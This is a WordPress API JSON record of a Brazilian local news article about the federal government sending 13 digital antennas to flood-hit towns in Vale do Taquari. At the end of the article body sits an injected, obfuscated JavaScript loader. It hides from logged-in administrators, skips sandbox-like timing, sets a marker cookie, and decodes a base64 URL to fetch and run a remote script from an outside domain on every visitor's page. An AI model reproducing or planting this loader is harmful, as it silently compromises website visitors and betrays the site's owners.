{"id":3707,"date":"2023-09-07T16:55:03","date_gmt":"2023-09-07T16:55:03","guid":{"rendered":"https:\/\/www.jornalnotiserra.com.br\/?p=3707"},"modified":"2026-04-04T18:07:52","modified_gmt":"2026-04-04T18:07:52","slug":"governo-federal-envia-13-antenas-digitais-para-restabelecer-sinal-de-internet-no-vale-do-taquari","status":"publish","type":"post","link":"https:\/\/www.jornalnotiserra.com.br\/index.php\/2023\/09\/07\/governo-federal-envia-13-antenas-digitais-para-restabelecer-sinal-de-internet-no-vale-do-taquari\/","title":{"rendered":"Governo federal envia 13 antenas digitais para restabelecer sinal de internet no Vale do Taquari"},"content":{"rendered":"<p><img loading=\"lazy\" class=\"size-thumbnail wp-image-3708 alignleft\" src=\"https:\/\/www.jornalnotiserra.com.br\/wp-content\/uploads\/2023\/09\/WhatsApp-Image-2023-09-07-at-13.52.40-150x150.jpeg\" alt=\"\" width=\"150\" height=\"150\" srcset=\"https:\/\/www.jornalnotiserra.com.br\/wp-content\/uploads\/2023\/09\/WhatsApp-Image-2023-09-07-at-13.52.40-150x150.jpeg 150w, https:\/\/www.jornalnotiserra.com.br\/wp-content\/uploads\/2023\/09\/WhatsApp-Image-2023-09-07-at-13.52.40-400x398.jpeg 400w, https:\/\/www.jornalnotiserra.com.br\/wp-content\/uploads\/2023\/09\/WhatsApp-Image-2023-09-07-at-13.52.40-300x300.jpeg 300w, https:\/\/www.jornalnotiserra.com.br\/wp-content\/uploads\/2023\/09\/WhatsApp-Image-2023-09-07-at-13.52.40-100x100.jpeg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" \/>O governo federal atendeu solicita\u00e7\u00e3o de prefeitos e j\u00e1 enviou 13 antenas digitais para restabelecer o sinal de internet e a comunica\u00e7\u00e3o nos munic\u00edpios impactados pelas fortes chuvas e enchentes no Vale do Taquari. A informa\u00e7\u00e3o \u00e9 do presidente da Companhia Nacional de Abastecimento (Conab), Edegar Pretto, que articulou o atendimento da demanda junto aos demais integrantes da comitiva enviada pelo presidente Lula, ontem, \u00e0 regi\u00e3o, para prestar solidariedade e anunciar medidas emergenciais de ajuda, entre elas, a doa\u00e7\u00e3o de 5 mil cestas de alimentos por parte da Conab.<\/p>\n<p>\u201cO secret\u00e1rio nacional de Defesa Civil, Wolnei Wolff, me passou em primeira m\u00e3o a not\u00edcia de que 13 antenas digitais j\u00e1 est\u00e3o em Porto Alegre e a caminho do Vale do Taquari. Aqui em Bras\u00edlia, mesmo no feriado de 7 de setembro, seguimos trabalhando para ajudar as v\u00edtimas da chuva. N\u00f3s vamos agir com rapidez, tudo o que estiver ao alcance do governo federal, na lideran\u00e7a do presidente Lula, n\u00f3s faremos pelo Rio Grande do Sul\u201d, refor\u00e7ou Pretto.<\/p>\n<p>Os representantes do governo federal se reuniram ontem com prefeitos da regi\u00e3o, em Lajeado, ocasi\u00e3o em que instru\u00edram sobre os procedimentos necess\u00e1rios por parte das prefeituras para agilizar a libera\u00e7\u00e3o de recursos. Al\u00e9m disso, ouviram relatos e acolheram demandas dos gestores, entre elas, a urg\u00eancia do restabelecimento da comunica\u00e7\u00e3o na regi\u00e3o, j\u00e1 que algumas comunidades encontram-se completamente isoladas.<\/p>\n<p>Conforme o secret\u00e1rio Wolff, ainda ontem, o Minist\u00e9rio das Comunica\u00e7\u00f5es disponibilizou as antenas digitais e a For\u00e7a A\u00e9rea Brasileira ajudou a transport\u00e1-las durante a madrugada. \u201cAs antenas ser\u00e3o distribu\u00eddas para as cidades da regi\u00e3o que mais precisam restabelecer a comunica\u00e7\u00e3o\u201d, explicou.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>O governo federal atendeu solicita\u00e7\u00e3o de prefeitos e j\u00e1 enviou 13 antenas digitais para restabelecer o sinal de internet e a comunica\u00e7\u00e3o nos munic\u00edpios impactados pelas fortes chuvas e enchentes no Vale do Taquari. A informa\u00e7\u00e3o \u00e9 do presidente da Companhia Nacional de Abastecimento (Conab), Edegar Pretto, que articulou o atendimento da demanda junto aos&#8230;<\/p>\n","protected":false},"author":7,"featured_media":3709,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[16],"tags":[],"_links":{"self":[{"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/posts\/3707"}],"collection":[{"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/comments?post=3707"}],"version-history":[{"count":1,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/posts\/3707\/revisions"}],"predecessor-version":[{"id":3710,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/posts\/3707\/revisions\/3710"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/media\/3709"}],"wp:attachment":[{"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/media?parent=3707"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/categories?post=3707"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/tags?post=3707"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}